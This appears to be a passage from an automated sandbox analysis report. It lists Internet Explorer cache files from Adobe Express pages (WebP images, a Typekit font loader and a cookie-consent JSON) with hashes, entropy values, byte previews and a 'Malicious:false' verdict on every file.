                                                                                                                                                                                                                                                        Preview: RIFF.1..WEBPVP8 .1.......*..k.>u2.G...!(.{P...hn....W..u.M...Cxm.~^.O......Q.K.~?...%.....g.7..........o........P{.~......K...w......B.4......._./...=..c.}.../..g.w..._......r..........w.....`...................?Y~..{...+6._...g....w.g.7....C~...........${../...^..;.......?....7...>.?.?....;.7./.....|..1........._..v~........+............... ...%I...o....Vc...B.)...K.F...:*.8.x.ik.6>...k..J....#C..#.n....(..&3Jy...f.P.nP.w..gE6E...7p...YF.}..&...=9... tU*"<U...Mg...H`.u..8R...0vwXH|fJ..V...^.<.........D.E...6.....?B.z.."W.d.*.X...:.2Mv.V.S.._.G.].....X_.......)Q..V....k.,..m...[.i....[.^....E../j..9..u.....w=JO.P....C:y........n....`su.%l.%.E$.....{..2}..>......"G.d....Ry...m....)...._K..j..`T...:.]..D....dA...+.thd@C$.$u........h.a...Y1Nz(...r..T..<....fKA..A|.#....5./...T..Kc.g....y[...t......i.J.G...}bk....Z..:...*/T....8.F...NP..l...C.$Y.l...64.~.7........J.x...}2..f.a...S;...o.n{.....2.../K.R)....P.....j*W!PD!...C)a|.f,!...c..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1b783cafb2748971aac00c4d44562b56dea639bbd[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10666
                                                                                                                                                                                                                                                        Entropy (8bit):7.977957389001278
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:R4H1BtRvrjyD9S/EB/ksM9QCXvekcPyO03l5aNeHbD+0LKfbByIO:iv6ZFhsn/eyrV0g7D+0Lz/
                                                                                                                                                                                                                                                        MD5:2E16313469254B0D50CCCF2F6A76688C
                                                                                                                                                                                                                                                        SHA1:9D5F83E7D93F586F1A1FC8ECDBD433D4509E2DAB
                                                                                                                                                                                                                                                        SHA-256:8F04B87523C2F1D98238F8503DD85CBB9A974E11CC76B54C37809EE6CB58066B
                                                                                                                                                                                                                                                        SHA-512:6DF1245C395E9CD7AF25C15F43FCA10A92CB77CE90F2209D76FE29FDEB4709DEB16DD103476341A451067BBDC589A0F8FC31FFEF8423A47870289AD97FBAA9AB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1b783cafb2748971aac00c4d44562b56dea639bbd.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.)..WEBPVP8 .)......*,...>u4.H$..!&U[....en._.........~.{}./..Q;"...0_..;.Z.`?n}Z.4z..^.G.W.........................].c.....<..y.._[...Y.g...>.~s..._........P/...........U.............^.}^.......?..._........).........?......{.S.......4.....O....O.?..............7........... I../.......S.....m...1..q\P..no..C].. :.f...3.U.{.1..[c*T....J.....<z.~...*:M...F..'.....F..K..Q....5..P.....l............$Gsxm.Gy...N.....X..N........D.}....)..R.(.].....".G.R...a.9c..........z.8>9...5.H..sf.v%.v...O~c.g.]L...h7..uv.2.:.>}#y.P...Z......uJ.;.>e...P$....=h..P..2k*.{...y4...w.m..I!...+...B.j....J.C.}.....N_j ..N...e.......=...I../....}d...1.0........B..#..Z..NX..r.$.-Z.....W.cJ...g..4[.7\T...I..w./.s..>..k^.....Jy..w..{....c(l3.PQ.[..I.]..|S.X.4.J...7a...z..._.S8....t....6..@.hw.m..1.0.44Y..k.i..w"........^s....b.......B.D........L75.._.4.P.jN..?-I$/.S..$?.|.G.).Q.B..bz.2[oD.&j..\.*...yU.)o..qT.....[R......'....Zh.t..`.....3.}N.().."|....g>:z.X..t.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1c340bf1a77952c05dc57609bbd46a900064367d0[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):13108
                                                                                                                                                                                                                                                        Entropy (8bit):7.98266124087218
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:xKgZgPMatEWHCHoZ0G8lZkLhRhmnhZ9IZ6wW:xRmtOyCu0GAkd+nhvwW
                                                                                                                                                                                                                                                        MD5:8CC9A37E3BA7E35B4E47069F769CA281
                                                                                                                                                                                                                                                        SHA1:D60A362BBEFE5FC99CAA7838D6D1A9F6B28BEDA0
                                                                                                                                                                                                                                                        SHA-256:4AE2D6C36C788233C27B83694256E0E77D4572793633BEF99C12342CC28999C7
                                                                                                                                                                                                                                                        SHA-512:915C40BE93B0E88883B85640F00DA4748A9FD37CEC1B9B89B006695A5791F754A334652812C3011D82F6F2CE1229DE019BFD6CF9BE265DF1F23BCD318DBC537C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1c340bf1a77952c05dc57609bbd46a900064367d0.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF,3..WEBPVP8 3.......*..k.>u4.G...!&.....en.O8.v%.}...N}.~v....a.i.m.}...z....].s......._.?`=...........................g....%.d...o........?..n..|.~....5.................~....../....?..b...n..?..../..:....././.............?..`.....?....L>....s..........~....A..._..H?............k.{...........|:....6&..j.c..v... .o=.Q......(.[KJ......fc.`..Cy..Y....w-..N..n....(k.Z,.Wl.]1k...B-@.....A...%{..o1.yVpiZ...).....4..+..Z.U;._....@.E...BJ.7>.F.....W[.s.I...*W.tB...-dbt.....B......Bd<FH.0..d.k/..e/|J._3.'.{+..c.....f..R.e..l#..u.v.Ya...#.....E..D..qj.... 8K."#..V.<|...r.h.R....%...&.5..N....4......+.FU.h.......\...........=.....W.F.j...<...X7......!'..?..."....uP..K..../E.-| ...k.....i6.b..e.)C..Z`e......4(.U6B.......e......T.O.S..1g.._..h..^..b.e~8j7s.U._...q.Z..7N...8....y.......@3R....x.iA^;..cyH..~H...P..)......C.5]..~..$z#...u.!....e@......k.t...=.r.az..1.W......W.|.v.v...s...SHF...K.]+.n.+.M.~.E.I..c...........7.*..+Z.-.qJ.\1.....2."D.Ym....L..?x..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1d4aca8ec56f4959f04271e33a31858565efbd6e3[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8884
                                                                                                                                                                                                                                                        Entropy (8bit):7.975741006145998
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:vram38YKavKXj/mOI6z0nqPxTbWYRDIdPVbhahjUOR7Xq:vOm38YKayz9VBpT6YRDIDF276
                                                                                                                                                                                                                                                        MD5:C04464C68AF03DEDDAB8E85C8B1577A0
                                                                                                                                                                                                                                                        SHA1:3A08B3F136279BF03AEFE1EFCE89854074D07F6B
                                                                                                                                                                                                                                                        SHA-256:EAC196B7C6764555B7158B27B46522A904B62B65C5A71D3A88A789141385A962
                                                                                                                                                                                                                                                        SHA-512:0B821A79E77F1C1499ADCCC17E389AC016022F08365ACBDAECE9112C73AD0C18168753E97BE7F2C82A1BA697A1A552B9894D0820AB5ED09BD56DE3068BDE7401
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1d4aca8ec56f4959f04271e33a31858565efbd6e3.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF."..WEBPVP8 ."......*,...>u6.H....%......in.}>.$En.....?...|jz_._^\....w...~....o._....u..._....x..Q.u.y..C./.?....;....p....~r|U.C.O.....~....5.....7...._....g...7.?._.....h...M......G..a....j..T....;...s..=....-*?K_.y$.>y....sq.l#...P.....Ld..D....0......N.Id|...........`.\....wluW`K|../.....r....3C\..s....r...KMaK.9.L1..Q..h...Gb..{K..D.|(.7G......e..%.M\.....L..+...17.>.....3.+..:F............P.M.....C.....0..0......Mx...z....X..h/W.M.$T...|..U.,...V..\..B.Y..$..y.&L.v.Q...j.....(p;.\H......Hb.4.....-F.)..[0..J.".......]+....]D...M.%...^...(2..B..1.gmj..@.{cK.R ...Gj..yR...n...Y.......~.....zM....f!i.v(pl&R.ar).......D.....,...xI..=..2..1'.R......W..T......wl..wg..V.C.b;...+H.R..X......5J>..../n....><$..>&.W'L.Z...(']z...,L@...P8.W..s.&-.....yHQ.T..dtk.w..._...Z..y.:b.t....|0]..8C.&....ZD.....J.g....H.....A...Rx.....dA...O...P...z:m.Fo?E.6..".'c7.D.S0t"..-B..w8<OKT..5.(..J..;.V.........c......0.Y.OJ....m....a~/.D....A........0@.b..la..?..?.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1d9fdd5a9f0a44850f1d4382b18c262e10e037bb8[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8596
                                                                                                                                                                                                                                                        Entropy (8bit):7.97469152074191
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:tINgmnhdNKQTKRCAgIv1Wrf/ybCnTFeKc3Y05XiwAiQWccxZN:UgmpKzRhgIv1WrnygTQKc3Y08wHQlc7N
                                                                                                                                                                                                                                                        MD5:D88D227EB4294347E04D4795538EEE7B
                                                                                                                                                                                                                                                        SHA1:4086720333814A7EDDBB2E9BB44806E043EF61C7
                                                                                                                                                                                                                                                        SHA-256:8124F3C0082F65A439C5C2E0D3C668F2A18C4C776CCEEBC3B614676975B6B3F4
                                                                                                                                                                                                                                                        SHA-512:AC62136BC0B92F1644D7043935151998D92E3B242D5F49F98E9A03E24550178A16383327CC5642778C39DE6A1D1276DF16C8F377C93B623F2834DE5DC9B3D0D0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1d9fdd5a9f0a44850f1d4382b18c262e10e037bb8.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.!..WEBPVP8 .!.......*..k.>u8.H..""$t:...cn.k..E.^l...._...U...a........{.....z......w........Y..........u.;...?..._..d.._...?]?.{Q.....o.........K......W.O....G......>a....^d}....;...o.....~..........=*.z.....+(.AL..C...z...aq....`.........QISf..e.p...Z.......].d.......y.F....8....k.'..TU........D....l&I..4..[O...*.}.5.M.-...3`*.1)...%...n0.P\N.I'...+_.5<7!..[.Sn-.Lt.DQ35.A...........O.N_....=.+[..?.....~mYA&....r..../.(...q....;....H....X0.YC...G-..@CS.^....0..=?i.\...E4..i@...G4.`.6...t^..WU...FYB.N.....7....R~...G}{..T...T.<....K.X.o.../.......<V........5...KB..GJ?.I..E.O.h...i...$..0.H%U).]l..*..S...V?$`"..o?.G.E...p......+.cS&.jufM.p.kq.E...s..E..{....N"....^....<0..._..~@1...j..4..Q...7...]vp.K..)E...no...Wo.5.....{.X6...5w.......i....-tQ...y>VQ.$.F4.Hp..0..{t.^.....{*n;.VONh.W7.8.EO.o...&...,..8....~...T.WJ-..E.Vak..AZ.5FP>wB.j.\b.((..8...ja.g7Kh-.r.X........o.^....npa0.$.x..V.!......|..S..Da....8..=...?az..R.sc&.j....`m..6.R(.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1ed4c2a2a5130e5f9cdeed32b1221f2e7d8988f38[1].jpeg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):6210
                                                                                                                                                                                                                                                        Entropy (8bit):7.962124363478672
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:lsF6b9jBPo5sFpZY6aFHTaPBb3K4hqzDW9Csj:lNjBQ5QLgFzaPpnhCwj
                                                                                                                                                                                                                                                        MD5:34A9826873AB6E5600A1AB2014C94A64
                                                                                                                                                                                                                                                        SHA1:F67628E01D5F1DBFA5095BE50B3A339CA7D03E0D
                                                                                                                                                                                                                                                        SHA-256:7B9D3091AEDFC9C1F5C85EF03B57CC69F64A7827146648AF315EF53F587AD19D
                                                                                                                                                                                                                                                        SHA-512:4333D5B2799FBACDC7D22DAFEA54FCE1AC4B6E9A2D85BC7659904AC140F04D64F1D0634F2DEE96A12BD818C3CA4362306270A63DD079C28AF1E0FE1831921778
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/create/media_1ed4c2a2a5130e5f9cdeed32b1221f2e7d8988f38.jpeg?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF:...WEBPVP8 .....S...*....>u6.H$..!&.Y....cn.s....Ys...[..f.p..l....v..9.I.....7.?.y.f.......~[...........%._......C..._.>.w..P/............-/...........F...o.....?Z..y_..x...............O.....?........q....O........t...=..FF...A##x.i..........fy.{.'.<....#..a....{.+...0.....g..m.F..}.t.Q...z\;.aYq... *H..-s.l.}P.5.#.R.3P....!.?...O.e;1..&H...B....CE?..k.i......X.._#.}'....zF.p.gqL.CY?...u.8..4...;d,g....t52..f..KEt.....5..m..._.p.X....6G&..........".X)..X...u.".-R_..O..?!..S.4.hd..F..i^_?..P...b..>.k.....Zh.....C-..2U@,.Y...eaM..........0....0..\....."5't..3...1....s.Sq.Y.2..c....0........,m........q,..H+i.O\L.J=.....~.6N.h...I......>.j.{.d..5y........... .....$.m.BH.[+...R.}.Y+..iq6..T.s9..t.Cd)B*.>...z..p.R...Lh.....1.T.|. )K...8.F.~....~|h..@..`..&]w...M$.....".8.S.W..I.h..Y^......Uf...l.a.vL...J.9...[+....-.s.....{...sw....z.PqqL..M....df.....%.-+m..AR.T..".S.Q...mF.:z...u%.....Qi..D...~.@>..$.i.eA.....=TjE.`-...Lz......h.x.f..p.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1edd2ae4453e3478187f2c8b4963eb73bac41e495[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1425
                                                                                                                                                                                                                                                        Entropy (8bit):7.846986071449694
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:kd/+3ZrtardldiUZshyimwmJkeEeh0lcs5Nm3iQvxrk0dEibOUAuakH/OUu/:8GpxaYUSVreEeh0lFXFQZrSu1/OUu/
                                                                                                                                                                                                                                                        MD5:32064E3D3A0F737AA0EFF9B226EB672A
                                                                                                                                                                                                                                                        SHA1:8E534A7077545B61CEEF3AE129DEE31BF381A8D3
                                                                                                                                                                                                                                                        SHA-256:1D24F0D3522F75191327F1246EDCAC37EB2A4298BBD101D88B3832A041179190
                                                                                                                                                                                                                                                        SHA-512:42C80828A905117B6C8350B0CAFB3FDF5A113BAE3DC2EA72C0EEED47DE002A0BBBA31D848CDED4B25313E42303631F448B2DBC2261BADDC5B1D59FF128B1E511
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 .....d...*....>.D.I%.#!&5.....gn.p.....u.M........G..r~`..'..y.y....@.#.F.......-._......f......._.....=..I...^....;.O.k.B.?:...[.v@_.8o(.......5N......LP.m...W.LP.m...W.FZ={Y?.qz.b.e.,N8...M....1z..d{,..~I.[.-..@..B.CE...Gv...!A{.02W\zC.+t.[{2....X.O\h...Y.I7...1@FdB+ DV.L...........K...`.O......D...._.....6.f..}.D1R..o......B.".D&<..<0jb...C6...%u.....<s.bX.xJ...]n...vO6~K.)..MOwJ..>.....-.X.J.....0/.F..d..e.hs9.L.I..4{X.R6..V9i..z4..k88..Ms.F.o.J.mD..#.w..#.7@......p...a.....J%@.'..F<....M......S.v...$.,.S.6.{..r.*.,..R..L ..?..D...Q-.. u5....{V.EE..L=D.v..R{.M.T.F.`9..c.....p.@....e.N.M..@b...\.j.M.H.......d....3.....4.G.}.r...U.ws..?..x..iF.\.n../..y...H.0PJ.)s.....z.y..uJ.<.(...A.R.yU..OX.N.c.,......h...:E.7.*W.Z`..P..&...O!.V..]...zF..hd.j..b..hd.j..b....Mf.?....e.[.r..[(.D_..lS|.?..$..|..Jh.w...j.].............ye.dH!..e..[xB.........U3M.N.......>>FL$\`..;9.u..'...m.NB....s..i..}.b.\0y$..P........C.pt.x?h...^...q..%V.1.~.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1f2ae695122a1df2dcaff5fde4f9cef91748f3769[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):13014
                                                                                                                                                                                                                                                        Entropy (8bit):7.984904416859448
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:iYQ6I1ktDPP51LdUEAHxTxXW05PwjdgPqA+GKmNirsOYh:inGDX5JefRdXW0GJdCL+LYh
                                                                                                                                                                                                                                                        MD5:81FA9EC16744CB2347C5A2FA284195CA
                                                                                                                                                                                                                                                        SHA1:AA86789212C97CB2B46B76A8C161ADA980AE4D5E
                                                                                                                                                                                                                                                        SHA-256:3D3172145872CA5A9ACA23A18B091DEACCCC52A46519A7B98B921AD91F7E5280
                                                                                                                                                                                                                                                        SHA-512:6A129D9545D156BF76F9805F4A5DDA1E73E73E702CD0ECCD3193490F1B361DDF0268802527883110AD5F36D6809CEE5190CC7BC828EB1AE70FC73777B4BC2DB5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1f2ae695122a1df2dcaff5fde4f9cef91748f3769.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.2..WEBPVP8 .2.......*..k.>u2.G...!(.{...gn...k....../...+........z..1....o....W...b.^.)}m?..}......x.......~w.?.W..v..o..?..{.O.+._~...........O._.{..7.o..`/Z...O.o..i?....'./.^...?......7.?.....y.}g...o...?.?.................._.g.w.O.o..?........{...K......,L....>../.I..-..Bi.......H..a.vN9`...;W.....a,..=...}..6.A.t}....d.J.c..'..N./....s`QTJ..Qq.i1.k[<.-o.T.........7.X?f..:.<K.z8Q.j/b.......E...nY.$.._..k|L.A~k`.....t.W..x....1...<....F.....4)].5......qJ.u...(...m.,0.O.U..:Do0..i.x.o...7E..3S....#y.)..N.A.i.`...3O1?-n.....nF..C.....rEh`...U."....k,..M.9..a..S*.=..=c......q..1}#!....g.u.n.%._..i.k.o......u..o=./..~*k......TX..sQ..?$x...*.....\...!...Rl...&...N.. ..<F."(L...>....}..f..Y.4.S....(a.....ym..r..."!f...vzH...i.H.L...*......~J.x.|..Iq..G.h-..iy..T.".a..C....`Lf..+QY.....=..X.#>!:.x.d.E..R...d.Q......-8..(b....W"DQ.1s.......=.o.).[.......,.R{]9..^BC..q..oM6....S.ZW).=...K.?)>?\.c.XI.f".(|.P...%FI...$..........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1fa045f4d4c047292a458e22d98daf93c380c0e89[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):17550
                                                                                                                                                                                                                                                        Entropy (8bit):7.987597081419026
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:VzN7+sTnbXvWtvwLojIv0nfRIN4o56JEsHax7IqIyhEUtIEO:D7HbbXvWtBQ0nJINpleq3ta
                                                                                                                                                                                                                                                        MD5:97E07C4E505EA91E3E5F1AEB084CEBC7
                                                                                                                                                                                                                                                        SHA1:647F7D477F30570AB273AF6BB18CED6246E66184
                                                                                                                                                                                                                                                        SHA-256:23F3EEAA4238B29C28CC2C4BF34287E5AD1A45CD50AF90E1E4F41E74A8C0F355
                                                                                                                                                                                                                                                        SHA-512:A62C6AAA9187AA231DCD23056A722BFB4D72521B327D6C9FF6903A3D0AF3E02DCB4D72B8600A2A6E36FCE3DBCB071B0B5250E72FD041C3F4CFE21C567F30F76C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1fa045f4d4c047292a458e22d98daf93c380c0e89.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.D..WEBPVP8 zD..0....*,...>u4.G.."!'.;....M.S.9.dD.?..}..o.....4...r.).[.k..........O.?..`......}_.z...+.....xO...>......i...9.w...W.......?k...J.....Z............m....\.;.......j|Q.k...o.....xS..2?.}......?...|.........9.......w.o...?x.....A..z........?+=......../..?..|..._.O.w....._....a.../..?.|..*......................g........E.Q.....'...?;.........T......e.@.......o..Ciu%9.g.eynt.......Qm~..'....P}..8.d.w....J.E.....)T.7HI4d....&..k...=.D...@{.7(G....rk...<.......K{Y....,...F..k...qp...j..g.J....N.i..qQ..`J[D3.%..l.e*;?.V.M.N...g...aa.f.......9.....[..o..7]....&.TvudT...,.o..E:..D.c...,m>..]...C.5...<t....'..wK,_.A.P.s^..3.....+..6(.....-1XV.1*.O}.[.S,J[<...+Z.r..[."0C.2..g......!.6.'.Wy1.[...u.>.....O,.....g.j....++........z.J.....l.5..d....B+.9.L....zi..L.[.<.......z#..... -.Z.....QR..';.N................{7..l.H..u...h.....g.R{..N.uM..7..R..xE.FX.Ng...>.....|u..*k..@...."<(xJw0..q.xR...uG.>.. ....k.....%=./o.q.,....i.l.H6..J7.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1fb87a53f48dd41152fe9155a1522a8a736f0aa79[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):7754
                                                                                                                                                                                                                                                        Entropy (8bit):7.975251572890017
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:ithS72fAYy/min+iipffFRS/d20xJQZ9IYWuvX+CxA4DiDDL7:+M6AY0minKXUZJg7X+CG4DeX
                                                                                                                                                                                                                                                        MD5:B851F70BA4F89E5E0598417E717FD636
                                                                                                                                                                                                                                                        SHA1:D530BBA2E4E893D259F8B7979BCBFFD793348615
                                                                                                                                                                                                                                                        SHA-256:8373216664102119C808524D3D2D39F59414F3A60545E991F87B4B69CD26258E
                                                                                                                                                                                                                                                        SHA-512:BE32A2358C3ADB718982D511C0C873ADA17663AE6F36101EEBF1A5CECEFE833361596349C77A79A0C14C105B6F9366BD74EFBFF0134DAD59A189E2EE9F43CBDA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1fb87a53f48dd41152fe9155a1522a8a736f0aa79.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFB...WEBPVP8 6...P....*,...>u6.H...!$.[ ...en.|.m......r.../.A.8...}........c...7.....O.^m.d......._.2g|.........g..z..S._.~.z.gN..................`/......<..t.....O.......?.?..`?...................'.......w...?..L_....c.w.O..._......n...3.S.....O...._...`..X2....e.+.I..o.b.....w#....<..CO!......X2.....6...!".F....o`&.Fb.T.RL........K.H(n......o-L.(;.4...E.A]B..<T=~9..u..U.P.z.......#.5.2.L.G......O.R4&k...........R.r.[.H.Al.5.NQ..z....{[t............AC|...42{.. T.8nu.. ..d.).mn~0......l..e.........4....lb.;....S..E-.OGb.....9...`.H.C.zQ.s.$].AY..^.u.L...f..3.\5...R.YD*y2.;d..X.".nJ:..H$.Q..W........B ..`..7... .... _G.}V4...@e....9...)...R.....c+.....F...4v...S.l.C..p..1[k.^.t.&........UJ"p2.Dd..B.............@R.....S.tq....^w...}...g...P1.ip.s...3p..B.N< ..l.p.Bu...).!..p..X.R..b......x..RmM.....N.J..."..(..MK}..W#.........Z.(k...?...o.C.#......s.Px..D.w@...=D.6.....I..!o.OSL.Fs....;.)...m \.R.e.@......Y)f..N.Q...p......X..X*Z.5=..*..g
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\onz5gap[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):18234
                                                                                                                                                                                                                                                        Entropy (8bit):5.586204667535263
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:x2V02tpIgIPs51iRm2lIew42noFeFsP9btiCtpIaCR:8V6q1iRm2XwMqsbbt6J
                                                                                                                                                                                                                                                        MD5:DAF93A792133E2F3BB29B04E819231C5
                                                                                                                                                                                                                                                        SHA1:5597BCE352A8B04E573CCECA126EB4912C626A9E
                                                                                                                                                                                                                                                        SHA-256:1B586E639CBD3E2276EB3A1DE829E913806653FE43D5C19A7ACA128A43DC69F1
                                                                                                                                                                                                                                                        SHA-512:9B409DDCCD60E505C008B88D55052723F2A25B62ABA596A1BB9FEAC1230DD037DB551F7A5928A6ACC5E158219B441E7B9428159885D6638497B2B5F9B2D42F9B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: /*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/00000000000000003b9b3f85. * - http://typekit.com/eulas/00000000000000003b9b3f88. * - http://typekit.com/eulas/00000000000000003b9b3f83. * - http://typekit.com/eulas/00000000000000003b9b3f8a. * proxima-nova:. * - http://typekit.com/eulas/00000000000000003b9b3068. *. * . 2009-2021 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"1655249","c":[".tk-proxima-nova","\"proxima-nova\",sans-serif",".tk-adobe-clean","\"adobe-clean\",sans-serif"],"fi":[139,7180,7182,7184,7185],"fc":[{"id":139,"family":"proxima-nova","src":"https://use.typekit.net/af/949f99/00000000000000003b9b3068/27/{format}{?primer,subset_id,fvd,v}","descript
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\otFlat[1].json
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):12847
                                                                                                                                                                                                                                                        Entropy (8bit):5.378720310141186
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:E5cgywp14jbK3e85csXf+oH6iAHyP1MJAR:Enp14S
                                                                                                                                                                                                                                                        MD5:8352C117A751ACC46F7AB179C088D425
                                                                                                                                                                                                                                                        SHA1:1F702763B6A77ED7129D726CC676FB2E7849360C
                                                                                                                                                                                                                                                        SHA-256:FB44400A61EDDA0B628AD2FF62CB5D299FAB4E7A18D586AE7D70481C6C9550B2
                                                                                                                                                                                                                                                        SHA-512:079D711759D43801F6C4E627EC4B5594D3AD2B4FA1BFD48FF9AE3D327561370FC0353D68C1AA95BCD0A76677D262F91EB9B0303DCF22649737D41EA9BC43ACC1
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://cdn.cookielaw.org/scripttemplates/6.9.0/assets/otFlat.json
